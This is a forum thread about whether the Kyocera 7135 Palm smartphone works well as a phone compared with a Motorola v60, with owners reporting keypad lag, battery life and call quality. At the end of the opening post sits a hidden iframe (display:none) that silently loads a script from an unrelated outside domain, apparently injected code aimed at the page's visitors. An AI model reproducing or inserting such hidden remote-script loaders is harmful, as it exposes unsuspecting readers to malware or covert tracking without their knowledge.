+ Reply to Thread

7135 - A good *PHONE*

Ok, so the 7135 is a great crossover gadget with millions of cool features blah, blah, blah.

If I decide to get one, it will be replacing a v60...which insofar has been the most usable, practical, and reliable cell phone Ive had so far. Id love to have the palm ability (along with the long list of other goodies the 7135 has), but this needs to be a cell phone first and foremost.

My question is, how good of a PHONE is the 7135, and is it going to be a let down compared to the practicality of my v60.

I know we are in two slightly different ballparks here, but I think the 7135 is the first crossover that can fill the void between the two. Im quite afraid of spending $500 on this, only to wish I had my little v60 back.

Ive read about pauses in keypresses, phone crashes, short battery life, etc. If I could get some of you lucky new owners to give your honest opinion on this, It would really help my decision process.

Thanks all!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    "Why all the pearls, why the blue hair, why anything!?"

The only real problems that I've had with the phone part of my 7135 were caused by software problems on the Palm part.

If what you want is a reliable phone, I'd say just don't go crazy with what you do to the Palm.

As for battery life. I've got two batteries, I typically never use the spare, and when I do it is most often because I was doing a ton of web surfing or game playing. In my normal use one battery lasts all day, and if it doesn't, well, that's what the spare is for.

I have experiences a little delay sometimes with keypresses, but it isn't really that big of a deal. The phone itself has never crashed or caused problems, but it is affected by the crashes on the Palm side.

That's my 2 bits.
    Sorry, but I no longer make 7135 headset adapters.

Thanks for the info. I had suspected a lot of palm junk might destabilize the phone. I was planning on adding minimal programs.

Then I'd say you'll have no problems.
    Sorry, but I no longer make 7135 headset adapters.

Great!...I mean...Great ....now I have to spend $500. :p

Originally posted by Azzy
    Great!...I mean...Great ....now I have to spend $500. :p
    You won't regret it!
    Please visit my picture site: Robert-O-Rama :)

Re: 7135 - A good *PHONE*

Originally posted by Azzy

My question is, how good of a PHONE is the 7135, and is it going to be a let down compared to the practicality of my v60.

I
    Azzy,
    I went from a V60 to the 7135. The phone part(at least to me) is BETTER than the V60. The calls sound clearer, and I am able to get calls in places, that were marginal at best. The biggest problem that I have is trying to figure out how to dial the darn thing. I have never useda palm before, so figuring out speed dial and how to dial from the address book is a little duanting, but easily overcome. in a nutshell?? GO FOR IT!!!!!

Tom
    To most people, the sky is the limit.
    To those who love flight, the sky is home

Kyocera 7135 - really good phone. I like mine 7135 :angel2

Just to address my own question now that I have my 7135...

The v60 is definatley much more reliable as a phone. Ive had some wierd things happen where the palm locks up for a second, and the phone wont answer when a call comes in (that happened once), and once I was in the middle of a game when someone called...and I couldn't figure out how to quit and get back to the phone.

Also, as people have mentioned the button presses can at times can lag a bit...but since I rarely dial outside of my address book, this bothers me very little.

Battery life is sup-par. But is expected. Please send us an extended battery!

Otherwise, the phone is awesome. The sound is very very clear, the reception is about the same, and the speakerphone is (IMHO) great. With the MP3 ringer, its very customizable, and with programs like TakePhone that can enhance the phone experience, it is in many ways far superior to a regular phone.

Hopefully with future firmware upgrades, this thing will be rock solid.

I am a little surprised at how many people say this is a "really good phone." Yes, the phone works great in combination with the PalmOS. Speed dialing/voice dialing make everything much easier. The signal and clarity has been great (especially compared to my old AT&T service). IMHO, the unit is a great package.
    However, the phone keypad is not "good" by any means. If you are a somewhat rapid dialer, you may find yourself in trouble. I have often dialed an entire 7 digit number only to have to wait about 5 to 10 seconds for the phone to catch up. Every number has to be pushed carefully and slowly, otherwise, the number will come up wrong. I have seen a few people express concerns on this forum on this matter, but there has either been no responses or discussion following their complaints. Why is that? Is it just a few phones that do this, or are people so darn happy with it (I am too, overall) that they don't want to be honest about this problem.
    I rate the phone's keypad as a "C", which would bring my overall rating of the phone to an "A-" since everything else about it is so darn good.

My 2 cents...

FWIW, I very rarely have any problems with a delay when I press the phone keys. I can remember it happening only once or twice in the three months I've had the phone and each time it was when I switched rapidly from a Palm app to the phone and started dialing. I think it is a problem that is only found on some phones. I agree, however, with those that don't like the lack of real feedback when you press a key. This is what sometimes slows down my dialing. But I am still in the "it's a great device" camp.

I definately try not to dial fast, but deliberately--and have few delays. I agree...the keypad is a "C" if not a "CD" (for those UMASS grads out there)

My big beef with the keypad is that you have to press the keys very directly for them to work. Especially the little buttons like the speakerphone one.

But like I said, It so freakin easy to put people into the address book (especially with directory assistant) that I don't dial too often...and when I do, Im sure to press each button with gusto.